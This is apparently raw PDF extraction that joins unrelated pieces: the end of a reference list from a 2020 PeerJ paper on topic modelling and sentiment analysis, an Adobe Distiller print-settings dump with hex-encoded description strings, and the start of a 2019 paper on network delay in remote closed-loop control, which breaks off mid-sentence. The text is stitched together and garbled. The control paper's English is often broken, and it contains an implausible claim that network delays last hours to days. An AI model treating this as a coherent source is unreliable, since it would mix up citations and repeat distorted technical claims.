http://dx.doi.org/10.1145/2133806.2133826 http://dx.doi.org/10.1109/TKDE.2012.103 http://dx.doi.org/10.1007/BF00332918 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Bradley MM, Lang PJ. 1999. Affective norms for English words (anew): instruction manual and affective ratings. Technical report C-1. The Center for Research in Psychophysiology, University of Florida. Bravo-Marquez F, Mendoza M, Poblete B. 2013. Combining strengths, emotions and polarities for boosting twitter sentiment analysis. In: Proceedings of the Second International Workshop on Issues of Sentiment Discovery and Opinion Mining. New York: Association for Computing Machinery, 2. Cambria E, Havasi C, Hussain A. 2012. Senticnet 2: a semantic and affective resource for opinion mining and sentiment analysis. In: Proceedings of the 25th International Florida Artificial Intelligence Research Society Conference. 202–207. Canini K, Shi L, Griffiths T. 2009. Online inference of topics with latent Dirichlet allocation. In: Proceedings of the Twelth International Conference on Artificial Intelligence and Statistics. 65–72. Clement J. 2019. Number of monthly active Twitter users worldwide from 1st quarter 2010 to 1st quarter 2019. Available at https://www.statista.com/statistics/282087/number-of-monthly-active- twitter-users/. Collobert R, Weston J, Bottou L, Karlen M, Kavukcuoglu K, Kuksa P. 2011. Natural language processing (almost) from scratch. Journal of Machine Learning Research 12(August):2493–2537. Dang Y, Zhang Y, Chen H. 2010. A lexicon-enhanced method for sentiment classification: an experiment on online product reviews. IEEE Intelligent Systems 25(4):46–53 DOI 10.1109/MIS.2009.105. Eguchi K, Lavrenko V. 2006. Sentiment retrieval using generative models. In: Proceedings of the 2006 Conference on Empirical Methods in Natural Language Processing. Stroudsburg: Association for Computational Linguistics, 345–354. Erhan D, Bengio Y, Courville A, Manzagol P-A, Vincent P, Bengio S. 2010. Why does unsupervised pre-training help deep learning? Journal of Machine Learning Research 11:625–660. Esuli A, Sebastiani F. 2006. Sentiwordnet: a publicly available lexical resource for opinion mining. In: Proceedings of the Fifth International Conference on Language Resources and Evaluation (LREC’06). Genoa: European Language Resources Association (ELRA). Vol. 6, 417–422. Go A, Bhayani R, Huang L. 2009. Twitter sentiment classification using distant supervision. CS224N Project Report. 1, Stanford University, 12. Green D, Swets J. 1966. Signal detection theory and psychophysics. Society 1:521. Hinton GE, Osindero S, Teh Y-W. 2006. A fast learning algorithm for deep belief nets. Neural Computation 18(7):1527–1554 DOI 10.1162/neco.2006.18.7.1527. Hinton GE, Salakhutdinov RR. 2006. Reducing the dimensionality of data with neural networks. Science 313(5786):504–507 DOI 10.1126/science.1127647. Hinton GE, Zemel RS. 1994. Autoencoders, minimum description length, and helmholtz free energy. Advances in Neural Information Processing Systems 6:3. Hofmann T. 1999. Probabilistic latent semantic analysis. In: Proceedings of the Fifteenth Conference on Uncertainty in Artificial Intelligence. Burlington: Morgan Kaufmann Publishers, 289–296. Hong J, Fang M. 2015. Sentiment analysis with deeply learned distributed representations of variable length texts. Stanford: Stanford University. Huh S, Fienberg SE. 2012. Discriminative topic modeling based on manifold learning. ACM Transactions on Knowledge Discovery from Data (TKDD) 5(4):20–25 DOI 10.1145/2086737.2086740. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 29/32 https://www.statista.com/statistics/282087/number-of-monthly-active-twitter-users/ https://www.statista.com/statistics/282087/number-of-monthly-active-twitter-users/ http://dx.doi.org/10.1109/MIS.2009.105 http://dx.doi.org/10.1162/neco.2006.18.7.1527 http://dx.doi.org/10.1126/science.1127647 http://dx.doi.org/10.1145/2086737.2086740 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Japkowicz N, Hanson SJ, Gluck MA. 2000. Nonlinear autoassociation is not equivalent to PCA. Neural Computation 12(3):531–545 DOI 10.1162/089976600300015691. Jo Y, Oh AH. 2011. Aspect and sentiment unification model for online review analysis. In: Proceedings of the Fourth ACM International Conference on Web Search and Data Mining. New York: ACM, 815–824. Kalchbrenner N, Grefenstette E, Blunsom P. 2014. A convolutional neural network for modelling sentences. Available at http://arxiv.org/abs/1404.2188. Kennedy A, Inkpen D. 2006. Sentiment classification of movie reviews using contextual valence shifters. Computational Intelligence 22(2):110–125 DOI 10.1111/j.1467-8640.2006.00277.x. Lakkaraju H, Socher R, Manning C. 2014. Aspect specific sentiment analysis using hierarchical deep learning. In: Deep Learning and Representation Learning Workshop at NIPS, 12 December 2014, Montreal. Li S, Huang C-R, Zhou G, Lee SYM. 2010. Employing personal/impersonal views in supervised and semi-supervised sentiment classification. In: Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics. Stroudsburg: Association for Computational Linguistics, 414–423. Lin C, He Y. 2009. Joint sentiment/topic model for sentiment analysis. In: Proceedings of the 18th ACM Conference on Information and Knowledge Management. New York: ACM, 375–384. Liu B. 2012. Sentiment analysis and opinion mining. Synthesis Lectures on Human Language Technologies 5(1):1–167 DOI 10.2200/S00416ED1V01Y201204HLT016. Maas AL, Daly RE, Pham PT, Huang D, Ng AY, Potts C. 2011. Learning word vectors for sentiment analysis. In: Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Technologies. Stroudsburg: Association for Computational Linguistics, Vol. 1, 142–150. Macmillan NA, Creelman CD. 2004. Detection theory: a user’s guide. Hove: Psychology Press. Mcauliffe JD, Blei DM. 2008. Supervised topic models. In: Advances in Neural Information Processing Systems. 121–128. Mei Q, Ling X, Wondra M, Su H, Zhai C. 2007. Topic sentiment mixture: modeling facets and opinions in weblogs. In: Proceedings of the 16th International Conference on World Wide Web. New York: ACM, 171–180. Mirowski P, Ranzato M, LeCun Y. 2010. Dynamic auto-encoders for semantic indexing. In: Proceedings of the NIPS, 2010 Workshop on Deep Learning, 1–9. Mohammad SM, Turney PD. 2013. Crowdsourcing a word-emotion association lexicon. Computational Intelligence 29(3):436–465 DOI 10.1111/j.1467-8640.2012.00460.x. Neri P. 2010. How inherently noisy is human sensory processing? Psychonomic Bulletin & Review 17(6):802–808 DOI 10.3758/PBR.17.6.802. Ngiam J, Chen Z, Koh PW, Ng AY. 2011. Learning deep energy models. In: Proceedings of the 28th International Conference on Machine Learning (ICML-11). Madison: Omnipress, 1105–1112. Nguyen DQ, Nguyen DQ, Vu T, Pham SB. 2014. Sentiment classification on polarity reviews: an empirical study using rating-based features. In: Proceedings of the 5th Workshop on Computational Approaches to Subjectivity, Sentiment and Social Media Analysis. Stroudsburg: Association for Computational Linguistics, 128–135. Nielsen FÅ. 2011. A new anew: evaluation of a word list for sentiment analysis in microblogs. Available at http://arxiv.org/abs/1103.2903. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 30/32 http://dx.doi.org/10.1162/089976600300015691 http://arxiv.org/abs/1404.2188 http://dx.doi.org/10.1111/j.1467-8640.2006.00277.x http://dx.doi.org/10.2200/S00416ED1V01Y201204HLT016 http://dx.doi.org/10.1111/j.1467-8640.2012.00460.x http://dx.doi.org/10.3758/PBR.17.6.802 http://arxiv.org/abs/1103.2903 http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Pang B, Lee L. 2004. A sentimental education: Sentiment analysis using subjectivity summarization based on minimum cuts. In: Proceedings of the 42nd Annual Meeting on Association for Computational Linguistics. Stroudsburg: Association for Computational Linguistics. Pang B, Lee L. 2005. Seeing stars: Exploiting class relationships for sentiment categorization with respect to rating scales. In: Proceedings of the 43rd annual meeting on association for computational linguistics. Stroudsburg: Association for Computational Linguistics, 115–124. Pang B, Lee L, Vaithyanathan S. 2002. Thumbs up? sentiment classification using machine learning techniques. In: Proceedings of the ACL-02 Conference on Empirical Methods in Natural Language Processing. Stroudsburg: Association for Computational Linguistics, Vol. 10, 79–86. Perotte AJ, Wood F, Elhadad N, Bartlett N. 2011. Hierarchically supervised latent Dirichlet allocation. In: Proceedings of the 24th International Conference on Neural Information Processing Systems, 2609–2617. Pollack JB. 1990. Recursive distributed representations. Artificial Intelligence 46(1):77–105 DOI 10.1016/0004-3702(90)90005-K. Porteous I, Newman D, Ihler A, Asuncion A, Smyth P, Welling M. 2008. Fast collapsed Gibbs sampling for latent Dirichlet allocation. In: Proceedings of the 14th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 569–577. Pouransari H, Ghili S. 2014. Deep learning for sentiment analysis of movie reviews. Available at https://cs224d.stanford.edu/reports/PouransariHadi.pdf. Riloff E, Wiebe J, Phillips W. 2005. Exploiting subjectivity classification to improve information extraction. In: Proceedings of AAAI-05, the 20th National Conference on Artificial Intelligence. Menlo Park: AAAI Press, Vol. 20, 1106. Saif H, Fernandez M, He Y, Alani H. 2013. Evaluation datasets for Twitter sentiment analysis: a survey and a new dataset, the sts-gold. In: 1st International Workshop on Emotion and Sentiment in Social and Expressive Media: Approaches and Perspectives from AI (ESSEM 2013). Turin, Italy. Shirani-Mehr H. 2014. Applications of deep learning to sentiment analysis of movie reviews. Available at https://cs224d.stanford.edu/reports/Shirani-MehrH.pdf. Smith G. 2019. 250 amazing facebook statistics and facts for 2019: by the numbers. Available at http://expandedramblings.com/index.php/by-the-numbers-17-amazing-facebook-stats. Socher R, Pennington J, Huang EH, Ng AY, Manning CD. 2011. Semi-supervised recursive autoencoders for predicting sentiment distributions. In: Proceedings of the Conference on Empirical Methods in Natural Language Processing. Stroudsburg: Association for Computational Linguistics, 151–161. Socher R, Perelygin A, Wu JY, Chuang J, Manning CD, Ng AY, Potts C. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In: Proceedings of the conference on empirical methods in natural language processing (EMNLP). Seattle: Association for Computational Linguistics, 1631–1642. Spacy. 2019. Spacy large core English model. Available at https://spacy.io/usage/models. Tang D, Wei F, Qin B, Liu T, Zhou M. 2014a. Coooolll: a deep learning system for Twitter sentiment classification. In: Proceedings of the 8th International Workshop on Semantic Evaluation (SemEval 2014). Dublin: Association for Computational Linguistics, 208–212. Tang D, Wei F, Yang N, Zhou M, Liu T, Qin B. 2014b. Learning sentiment-specific word embedding for Twitter sentiment classification. In: Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics. Baltimore: Association for Computational Linguistics, 1555–1565. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 31/32 http://dx.doi.org/10.1016/0004-3702(90)90005-K https://cs224d.stanford.edu/reports/PouransariHadi.pdf https://cs224d.stanford.edu/reports/Shirani-MehrH.pdf http://expandedramblings.com/index.php/by-the-numbers-17-amazing-facebook-stats https://spacy.io/usage/models http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Teh YW, Jordan MI, Beal MJ, Blei DM. 2005. Sharing clusters among related groups: Hierarchical Dirichlet processes. In: Proceedings of the 17th International Conference on Neural Information Processing Systems. 1385–1392. Thelwall M, Buckley K, Paltoglou G. 2012. Sentiment strength detection for the social web. Journal of the American Society for Information Science and Technology 63(1):163–173 DOI 10.1002/asi.21662. UMICH. 2011. Umich si650—sentiment classification. Available at https://www.kaggle.com/c/si650winter11. Vincent P, Larochelle H, Lajoie I, Bengio Y, Manzagol P-A. 2010. Stacked denoising autoencoders: learning useful representations in a deep network with a local denoising criterion. Journal of Machine Learning Research 11:3371–3408. Voegtlin T, Dominey PF. 2005. Linear recursive distributed representations. Neural Networks 18(7):878–895 DOI 10.1016/j.neunet.2005.01.005. Whitelaw C, Garg N, Argamon S. 2005. Using appraisal groups for sentiment analysis. In: Proceedings of the 14th ACM International Conference on Information and Knowledge Management. New York: ACM, 625–631. Wilson T, Wiebe J, Hoffmann P. 2005. Recognizing contextual polarity in phrase-level sentiment analysis. In: Proceedings of the Conference on Human Language Technology and Empirical Methods in Natural Language Processing. Stroudsburg: Association for Computational Linguistics, 347–354. Wu JY, Pao Y. 2012. Predicting sentiment from Rotten Tomatoes Movie reviews. Available at https://nlp.stanford.edu/courses/cs224n/2012/reports/WuJean_PaoYuanyuan_224nReport.pdf. Zhu J, Ahmed A, Xing EP. 2009. MedLDA: maximum margin supervised topic models for regression and classification. In: Proceedings of the 26th Annual International Conference on Machine Learning. New York: ACM, 1257–1264. Zirn C, Niepert M, Stuckenschmidt H, Strube M. 2011. Fine-grained sentiment analysis with structural features. In: Proceedings of 5th International Joint Conference on Natural Language Processing. Chiang Mai: Asian Federation of Natural Language Processing, 336–344. Al Moubayed et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.252 32/32 http://dx.doi.org/10.1002/asi.21662 https://www.kaggle.com/c/si650winter11 http://dx.doi.org/10.1016/j.neunet.2005.01.005 https://nlp.stanford.edu/courses/cs224n/2012/reports/WuJean_PaoYuanyuan_224nReport.pdf http://dx.doi.org/10.7717/peerj-cs.252 https://peerj.com/computer-science/ Beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling Introduction Related work Methods Data sets and experiments Results Discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_fmhzphukuvglrmwo2uwkvy6oru ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-068 30 Research of Network Closed-loop Control System Based on the Model Predictive Control Xu Shuping School of Computer Science & Engineering Xi’an Technological University Xi’an, 710032, China E-mail: 563937848@qq.com Wang Shuang School of Computer Science & Engineering Xi’an Technological University Xi’an, 710032, China Guo yu School of Computer Science & Engineering Xi’an Technological University Xi’an, 710032, China Su Xiaohui School of Computer Science & Engineering Xi’an Technological University Xi’an, 710032, China Abstract—Uncertainty latency of the remote closed-loop control system in information transmission through Internet, Analysis delays how to influence closed-loop control system. Based on predictive control method of neural network, research the application of closed-loop control system control methods under a random network delay. Simulation results show that: This method is able to reflect and predict the delay characteristics of between network path represented by the measured data, and can be replace actual network to research in application based on Internet closed-loop control system; the methods used is fast and accurate, it can be used for online learning network model and predict the network delay value, provides a new way of remote closed-loop control based on Internet. Keywords-Remote Control; Neural Network; Network Delay; Model Predictive Control I. INTRODUCTION The remote control system is an integration of control technology and network communication technology, it applications in many fields more and more common as ocean development, space station maintenance, remote surgery, virtual reality in recent years, and stable, fast, accurate is the highest target remote control system pursue[1]. Closed-loop controller is to control by the disturbances of feedback, which is by comparative behavior of the system output and the deviation between expectations to make the appropriate control action to eliminate the bias in order to achieve the desired system performance. It has the ability to suppress interference, is not sensitive to changes in device characteristics, and can improve the response characteristics of the system. The delay phenomenon exist in the field of remote control is a common problem exists in the remote closed-loop control applications. Delay does not only exist in the before control channel of system and in feedback channel. The delay in before control channel Makes the control signal unable to act on the controlled object, the delay in the feedback channel makes the controller can not found the change of controlled object immediately[2]. mailto:xusp686@163.com International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 31 Delay value influence by the inherent properties of control information transmission network such as the network structure, the amount of data transmission, the transmission timing and transmission agreements and other factors[3], the size of the delay values are reasonable from a few hours to several days[4], the approximate value will bring a big problem of the stability and dynamic quality of the remote control system[5], analysis and research the delay problems of the remote control system is a long-term in this area. II. ISSUES PROPOSE A. The influence of delay on the stability of remote control system Delay has a lot of influence on real-time, accuracy and stability performance of the remote control system. Kinetic of equation a single-link robotic arm second-order remote control system as follows[6]: 2 2 10 sin 2 d d u dt dt       Among them,  represent the angle of robot arm;  represent the behalf of DC motor torque. simulink block diagram of Mechanical Arm shown in Figure 1. Figure 1. Simulink Block Diagram of Mechanical Arm Since the forward channel and feedback channel in remote control system is generally the same physical link, the article assumes that the forward channel and feedback channel delay values equal. First set the delay time Delay to 0, that is without delay, adjust the PID parameters (how much) to get the response curve satisfied. Secondly, to maintain the constant of the PID parameters, increase the network delay value gradually when the network delay value is set to 0.02s to get feedback curve in Figure 2 (a), the performance of the system compared with without delay gradual deterioration this time , when the network latency increased to 0.05s, the feedback curve in Figure 2 (b), system becomes a oscillation system, and continue to increase the delay to 0.06s, the feedback curve in Figure 2 (c), system response divergence, that is system becomes unstable. It can be seen that increase the delay gradually make the control systems become increasingly unstable. (a) (b) (c) Figure 2. The Influence on the Stability of the Control System from Remote Control Delay International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 32 B. Research for the stability of remote control system There are a lot of research on the stability improvement of the remote control system, in 1965, Ferrel put forward network delay problem of need to pay attention to time-varying in the network control [7]. Halevi and Ray in the literature[8] augmented deterministic discrete-time model for the periodic network delay, Gregory C. Walsh in the literature[9] considered controller and controlled object is nonlinear time-varying assuming no observation noise, based on nonlinear perturbation method theory, the network delay impact the system is described as a perturbation of the continuous-time systems. Walsh and Bushnel in the literature [10] to prove this method and conclusions can applicable equally to linear systems. Goktas in the literature [11] saw sc and ca as a 